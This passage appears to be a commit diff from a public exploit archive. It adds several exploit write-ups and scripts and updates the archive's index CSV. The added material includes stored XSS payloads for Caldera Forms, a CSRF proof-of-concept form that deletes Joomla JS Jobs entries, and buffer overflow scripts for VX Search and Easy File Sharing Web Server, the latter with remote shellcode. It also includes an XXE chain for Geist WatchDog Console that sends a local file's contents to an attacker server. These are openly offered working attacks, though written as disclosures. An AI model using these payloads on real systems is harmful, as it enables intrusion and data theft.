4. You will be having a popup: ManhNho
References:
------------------------
https://pastebin.com/Y9uEC4nu
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9857

159
exploits/php/webapps/44489.txt Normal file
View file

@ -0,0 +1,159 @@
# Exploit Title: CalderaForms 1.5.9.1 - multiple XSS
# Date: 02-03-2018
# Exploit Author: Federico Scalco
# fscalco at mentat dot is
# @mindpr00f
# Vendor Homepage: https://calderaforms.com/
# Software Link: https://wordpress.org/plugins/caldera-forms/
# Vulnerable App: https://github.com/CalderaWP/Caldera-Forms/archive/1.5.9.1.zip
# Version: 1.5.9.1 (older versions may also be affected)
# Tested on: WordPress 4.9.4
# CVE : CVE-2018-7747
1) SOFTWARE DESCRIPTION
"Caldera Form is a free and powerful WordPress plugin that creates
responsive forms with a simple drag and drop editor."
It is reported to have 100,000+ active installations at the moment of this
writing.
2) VULNERABILITY OVERVIEW
The application fails to validate user-supplied input, hence it stores the
unsanitized buffer in the database.
The vulnerabilities reported here will be exploitable ONLY if certain
conditions are met, which is not the case in a CF's default configuration
(although still being vulnerable).
A note on buffers containing strings:
single (') and double (") quotes are correctly escaped, backticks (`)
are not.
3) DETAILS
3.a) Stored XSS - public
When submitting a CF form, the plugin will show a greeting message to
notify the user that everything went ok.
This message is editable by the site's admin and can contain part of the
user-supplied data (e.g. they're first name). In this case, simply inject
HTML code into the parameter which gets returned in the greeting message
and submit the POST request. A JSON response will follow, containing, among
other data:
- the greeting message ("html", which contains the malicious payload that
gets executed right away)
- form's ID ("form_id")
- data's ID ("cf_id")
{
"data":{"cf_id":"<DATA_ID>"},
"html":"<GREETING MESSAGE>",
"type":"...",
"form_id":"<FORM_ID>",
"form_name":"...",
"status":"..."
}
At this point, to reach the stored XSS, simply build a GET request using
the obtained data.
The malicious payload will be found at
http(s)://<target>/cf-api/<FORM_ID>/?cf_su=1&cf_id=<DATA_ID>
Vulnerable config:
- form > form settings > capture entries > checked (ON by default)
- form > form settings > success message > add some of the user
supplied fields (absent by default)
To replicate this on a fresh install:
- Create a new, default, contact form
- Go to "Form Settings" tab and edit the success message to include,
for example, the user's first name.
e.g.: Form has been successfully submitted. Thank you %first_name%.
- Save & publish
- As an unauthenticated user, submit the contact form injecting HTML
code in first name's parameter. XSS will be triggered right away
- To recall the payload as a stored XSS, read the POST's response and
point your browser to
<target>/cf-api/<FORM_ID>/?cf_su=1&cf_id=<DATA_ID>
3.b) Stored XSS - admin interface
CalderaForms gives the ability to notify the admin via email everytime a
form gets submitted.
Furthermore, an admin can choose to enable an "email transacion log" for
debugging purposes (disabled by default).
If this configuration is in place, a copy of the malicious payload
described above will be shown in the administration panel, when visiting
that form's malicious entry's details.
Vulnerable config:
- form > form settings > capture entries > checked (ON by default)
- form > email > debug mailer > checked (OFF by default)
To replicate this on a fresh install:
- Enable the transaction log (form -> edit -> email tab -> check
"Enable email send transaction log")
- Replicate the injection described at 3.a (all fields can be used this
time) as an unauthenticated user
- Back again in the admin interface, visit form's entries, identify the
malicious one and click on the "view" button
This will pop a details window and trigger the XSS.
3.c) Importing a weaponized form - admin interface
CalderaForms gives the ability to import a form (JSON format).
A malicious form field can be crafted which will trigger an XSS when said
field gets displayed/edited after the import.
It's worth noting that this flaw does not depend on custom configurations,
although it's not "remotely" and "automatically" exploitable. The problem
here arise, for example, when an admin imports a malicious JSON.
To replicate this on a fresh install:
- Create a form and export it (JSON format)
- Edit the json and inject HTML code. "label" and "slug" parameters
were tested, others may be vulnerable too.
e.g.:
{
...
"label":"First<script>alert(1);</script> Name",
"slug":"first_name\"/><script>alert(2);</script>"
...
}
- Import the malicious form to trigger the XSS in the administration
interface
4) REMEDIATION
Update to the latest version available.
If any personalized configuration is found exploitable, the following steps
can be followed, as a temporary mitigation strategy, if no update is
available or updating is not an option, for whatever reason:
- for every form, under "Form Settings", prune every variable that gets
returned to the user as a success message
- for every form, under the "Email" tab, un-check "Enable email send
transaction log"
- for every form that gets imported perform a thorough review
5) TIMELINE & FINAL NOTES
02-03-18 > vendor gets notified
06-03-18 > vendor replies
07-03-18 > CVE requested and assigned
27-03-18 > patch released
27-03-18 > vulnerability disclosed
Special thanks go to Josh Pollock and his team, from Caldera, who invested
passion and energy in understanding and patching these issues.

68
exploits/php/webapps/44492.txt Normal file
View file

@ -0,0 +1,68 @@
#######################################
# Exploit Title: Joomla! Component Js Jobs - Multiple Cross Site Request Forgery Vulnerabilities
# Google Dork: N/A
# Date: 17-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: https://www.joomsky.com
# Software Link: https://extensions.joomla.org/extension/js-jobs/
# Affected Version: 1.2.0
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : NA
#######################################
1. Vendor Description:
JS Jobs for any business, industry body or staffing company wishing to
establish a presence on the internet. JS Jobs allows you to run your own,
unique jobs classifieds service where you or employer can advertise their
jobs and job seekers can upload their Resumes.
2. Technical Description:
The state changing actions in JS Jobs before 1.2.1 not having any random
token validation which results in Cross Site Request Forgery Vulnerability.
3. Proof of Concept:
Delete Job Entry [Super Admin Access]
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://[URL]/joomla/administrator/index.php"
method="POST">
<input type="hidden" name="js&#95;sortby" value="0" />
<input type="hidden" name="companyname" value="" />
<input type="hidden" name="jobtitle" value="" />
<input type="hidden" name="location" value="" />
<input type="hidden" name="jobcategory" value="" />
<input type="hidden" name="jobtype" value="" />
<input type="hidden" name="datefrom" value="" />
<input type="hidden" name="dateto" value="" />
<input type="hidden" name="status" value="" />
<input type="hidden" name="cid&#91;&#93;" value="[Job ID]" />
<input type="hidden" name="limit" value="20" />
<input type="hidden" name="limitstart" value="0" />
<input type="hidden" name="option" value="com&#95;jsjobs" />
<input type="hidden" name="task" value="job&#46;jobenforcedelete" />
<input type="hidden" name="c" value="job" />
<input type="hidden" name="view" value="job" />
<input type="hidden" name="layout" value="jobs" />
<input type="hidden" name="callfrom" value="jobs" />
<input type="hidden" name="boxchecked" value="1" />
<input type="hidden" name="sortby" value="asc" />
<input type="hidden" name="my&#95;click" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
4. Solution:
Update to latest version
https://extensions.joomla.org/extension/js-jobs/

23
exploits/windows/dos/44494.py Executable file
View file

@ -0,0 +1,23 @@
#!/usr/bin/python
# Title: VX Search 10.6.18 Local Buffer Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: http://www.vxsearch.com
# Version: 10.6.18
# Date: 18/04/2018
# Tested on: Windows 7 32-bit
# Vendor did not respond to advisory.
# Copy the contents of vxsearchpoc.txt, click the Server icon and paste into the directory field.
filename="vxsearchPOC.txt"
junk = "A"*271
#0x652c2a1a : "jmp esp" | asciiprint,ascii {PAGE_READONLY}[QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS:False, v4.3.4.0 (C:\Program Files\VX SearchServer\bin\QtGui4.dll)
#eip="\x1a\x2a\x2c\x65"
eip = "B" * 4
fill = "C" *900
buffer = junk + eip + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

67
exploits/windows/remote/44485.py Executable file
View file

@ -0,0 +1,67 @@
# Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow
# Date: 03/24/2018
# Exploit Author: rebeyond - http://www.rebeyond.net
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# CVE: CVE-2018-9059
# Tested on: Windows XP Professional SP3
#
# Description:
# Attackers just need to construct a malicious login request packet,and send the packet to the server.The server can be pwned
#
#
# The stack trace is as follows:
# (40d8.2980): Access violation - code c0000005 (first chance)
# r
# eax=41414141 ebx=00000001 ecx=ffffffff edx=08fb62a0 esi=08fb6280 edi=08fb62a0
# eip=61c277f6 esp=08fb61fc ebp=08fb6214 iopl=0 nv up ei pl nz na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll -
# sqlite3!sqlite3_errcode+0x8e:
# 61c277f6 81784c97a629a0 cmp dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=????????
#
# kb
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 083b6214 61c6286c 00001183 0000115d 085c4d44 sqlite3!sqlite3_errcode+0x8e
# *** WARNING: Unable to verify checksum for fsws.exe
# *** ERROR: Module load completed but symbols could not be loaded for fsws.exe
# 083b6254 004968f4 00000001 00000000 083b6280 sqlite3!sqlite3_declare_vtab+0x3282
# 083b6274 004975a3 083b6298 00000000 083b75fc fsws+0x968f4
# 00000000 00000000 00000000 00000000 00000000 fsws+0x975a3
import requests
host='192.168.50.30'
port='80'
buf='A'*4071
buf +='\x12\x45\xfa\x7f' #jmp esp
buf +='A'*12
buf +='\xeb\x36' #jmp 0x36
buf +='A'*42
buf +='\x60\x30\xc7\x61'*2 #must be valid address
buf +='A'*4
#shellcode to execute calc.exe on remote server
buf += "\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x24\xa7\x26\xec\x33"
buf += "\xc9\xb1\x31\x31\x58\x18\x03\x58\x18\x83\xe8\xd8\x45"
buf += "\xd3\x10\xc8\x08\x1c\xe9\x08\x6d\x94\x0c\x39\xad\xc2"
buf += "\x45\x69\x1d\x80\x08\x85\xd6\xc4\xb8\x1e\x9a\xc0\xcf"
buf += "\x97\x11\x37\xe1\x28\x09\x0b\x60\xaa\x50\x58\x42\x93"
buf += "\x9a\xad\x83\xd4\xc7\x5c\xd1\x8d\x8c\xf3\xc6\xba\xd9"
buf += "\xcf\x6d\xf0\xcc\x57\x91\x40\xee\x76\x04\xdb\xa9\x58"
buf += "\xa6\x08\xc2\xd0\xb0\x4d\xef\xab\x4b\xa5\x9b\x2d\x9a"
buf += "\xf4\x64\x81\xe3\x39\x97\xdb\x24\xfd\x48\xae\x5c\xfe"
buf += "\xf5\xa9\x9a\x7d\x22\x3f\x39\x25\xa1\xe7\xe5\xd4\x66"
buf += "\x71\x6d\xda\xc3\xf5\x29\xfe\xd2\xda\x41\xfa\x5f\xdd"
buf += "\x85\x8b\x24\xfa\x01\xd0\xff\x63\x13\xbc\xae\x9c\x43"
buf += "\x1f\x0e\x39\x0f\x8d\x5b\x30\x52\xdb\x9a\xc6\xe8\xa9"
buf += "\x9d\xd8\xf2\x9d\xf5\xe9\x79\x72\x81\xf5\xab\x37\x7d"
buf += "\xbc\xf6\x11\x16\x19\x63\x20\x7b\x9a\x59\x66\x82\x19"
buf += "\x68\x16\x71\x01\x19\x13\x3d\x85\xf1\x69\x2e\x60\xf6"
buf += "\xde\x4f\xa1\x95\x81\xc3\x29\x74\x24\x64\xcb\x88"
cookies = dict(SESSIONID='6771', UserID=buf,PassWD='')
data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)

97
exploits/xml/webapps/44493.txt Normal file
View file

@ -0,0 +1,97 @@
# Exploit Author: bzyo
# CVE: CVE-2018-10077, CVE-2018-10078, CVE-2018-10079
# Twitter: @bzyo_
# Exploit Title: Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities
# Date: 04-17-18
# Vulnerable Software: WatchDog Console - 3.2.2
# Vendor Homepage: http://www.itwatchdogs.com/
# Version: 3.2.2
# Software Link: http://www.itwatchdogs.com/userfiles/file/firmware/Console/WatchDogConsoleInstaller_v3.2.2.exe
# Tested On: Windows 7 x86
Description
-----------------------------------------------------------------
WatchDog Console suffers from multiple vulnerabilities:
# CVE-2018-10077 Authenticated XML External Entity (XXE)
# CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS)
# CVE-2018-10079 Insecure File Permissions
Prerequisites
-----------------------------------------------------------------
To successfully exploit these vulnerabilities, an attacker must already have access
to a system running WatchDog Console using a low-privileged user account
Proof of Concepts
-----------------------------------------------------------------
### CVE-2018-10079 Insecure File Permissions ###
By default, WatchDog Console 3.2.2 installs all configuration data at 'C:\ProgramData\WatchDog Console' and
gives 'Authenticated Users' group Modify permissions
C:\>icacls "c:\ProgramData\WatchDog Console"
c:\ProgramData\WatchDog Console NT AUTHORITY\Authenticated Users:(OI)(CI)(M,DC)
This allows any local user of the system the ability to reset the application admin password by generating
a password using the PHP md5() function and updating the config.xml file. It also provides the ability to
add data to servers.xml for both CVE-2018-10078 and CVE-2018-10079 or through the application interface
### CVE-2018-10077 Authenticated XML External Entity (XXE) ###
With authenticated admin access to the application or local access to the system, a user has the ability to read
system files remotely through XXE
On attacking machine
- Create data.xml with following contents in apache root and start apache listening on 80
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://192.168.0.149:8080/evil.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
- Create evil.xml with the following contents anywhere
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://192.168.0.149:8080/?%data;'>">
- Start python simple http server in same directory as evil.xml, listening on 8080
python -m SimpleHTTPServer 8080
On victim machine (1 of 2 ways)
1. With admin access to application console, add attacking server IP address under servers tab
or
2. With local access to system
- update 'C:\ProgramData\WatchDog Console\servers.xml file' with following:
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<servers>
<server host="192.168.0.149" addrType="http" port="80" description="" selEmail="True" Username="1" Password="1" left="700" top="420" />
</servers>
- restart system
On attacking machine
- Contents of 'win.ini' is outputted to console
- evil.xml can be updated to read other sensitive files (tested reading file from admin desktop)
### CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) ###
This application suffers from authenticated XSS on several inputs (1 of 2 ways)
1. With admin access to application console, under servers tab
- add dummy IP in server name filed
- add <script>alert(document.cookie)</script>"> into server description
or
2. With local access to system
- update 'C:\ProgramData\WatchDog Console\servers.xml file' with following:
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<servers>
<server host="172.16.1.1" addrType="http" port="80" description="<script>alert(document.cookie)</script>">" selEmail="True" Username="1" Password="1" left="400" top="180" />
</servers>
- restart system
3. popup with cookie appears when browsing from Overview, Dashboard, and Server tabs. Remains after reboot.
Timeline
---------------------------------------------------------------------
04-14-18: Vendor notified of vulnerabilities
04-16-18: Vendor responded "Thank you for bringing this to our attention. The product has now been End-of-life for
several years and is no longer receiving updates."
04-17-18: Submitted public disclosure

17
files_exploits.csv
View file

@ -5938,6 +5938,9 @@ id,file,description,date,author,type,platform,port
44466,exploits/windows/dos/44466.txt,"Microsoft Windows - 'CiSetFileCache' TOCTOU Incomplete Fix",2018-04-16,"Google Security Research",dos,windows,
44467,exploits/windows/dos/44467.txt,"Microsoft Edge - 'OpenProcess()' ACG Bypass",2018-04-16,"Google Security Research",dos,windows,
44468,exploits/windows/dos/44468.py,"Zortam MP3 Media Studio 23.45 - Local Buffer Overflow (SEH)",2018-04-16,"Kevin McGuigan",dos,windows,
44490,exploits/linux/dos/44490.txt,"PDFunite 0.41.0 - '.pdf' Local Buffer Overflow",2018-04-18,Hamm3r.py,dos,linux,
44491,exploits/multiple/dos/44491.txt,"RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow",2018-04-18,Hamm3r.py,dos,multiple,
44494,exploits/windows/dos/44494.py,"VX Search 10.6.18 - 'directory' Local Buffer Overflow",2018-04-18,"Kevin McGuigan",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16413,7 +16416,8 @@ id,file,description,date,author,type,platform,port
44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
44473,exploits/hardware/remote/44473.txt,"D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting",2018-04-17,"Sayan Chatterjee",remote,hardware,
44482,exploits/php/remote/44482.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
44482,exploits/php/remote/44482.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
44485,exploits/windows/remote/44485.py,"Easy File Sharing Web Server 7.2 - Stack Buffer Overflow",2018-04-18,rebeyond,remote,windows,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39095,6 +39099,7 @@ id,file,description,date,author,type,platform,port
44295,exploits/hardware/webapps/44295.txt,"Contec Smart Home 4.15 - Unauthorized Password Reset",2018-03-16,Z3ro0ne,webapps,hardware,
44317,exploits/hardware/webapps/44317.py,"Intelbras Telefone IP TIP200 LITE - Local File Disclosure",2018-03-20,anhax0r,webapps,hardware,
44318,exploits/php/webapps/44318.txt,"Vehicle Sales Management System - Multiple Vulnerabilities",2018-03-20,Sing,webapps,php,
44320,exploits/hardware/webapps/44320.txt,"Coship RT3052 Wireless Router - Persistent Cross-Site Scripting",2018-03-20,"Sayan Chatterjee",webapps,hardware,
44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,
44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml,
44346,exploits/php/webapps/44346.rb,"ClipBucket - beats_uploader Unauthenticated Arbitrary File Upload (Metasploit)",2018-03-27,Metasploit,webapps,php,
@ -39169,7 +39174,15 @@ id,file,description,date,author,type,platform,port
44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
44448,exploits/php/webapps/44448.py,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
44449,exploits/php/webapps/44449.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80
44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp,
44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php,
44483,exploits/php/webapps/44483.txt,"MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting",2018-04-18,"Keerati T.",webapps,php,80
44484,exploits/php/webapps/44484.txt,"Rvsitebuilder CMS - Database Backup Download",2018-04-18,"Hesam Bazvand",webapps,php,
44486,exploits/php/webapps/44486.txt,"Match Clone Script 1.0.4 - Cross-Site Scripting",2018-04-18,ManhNho,webapps,php,80
44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,
44488,exploits/hardware/webapps/44488.py,"Lutron Quantum 2.0 - 3.2.243 - Information Disclosure",2018-04-18,SadFud,webapps,hardware,
44489,exploits/php/webapps/44489.txt,"WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting",2018-04-18,"Federico Scalco",webapps,php,80
44492,exploits/php/webapps/44492.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery",2018-04-18,"Sureshbabu Narvaneni",webapps,php,80
44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml,

Can't render this file because it is too large.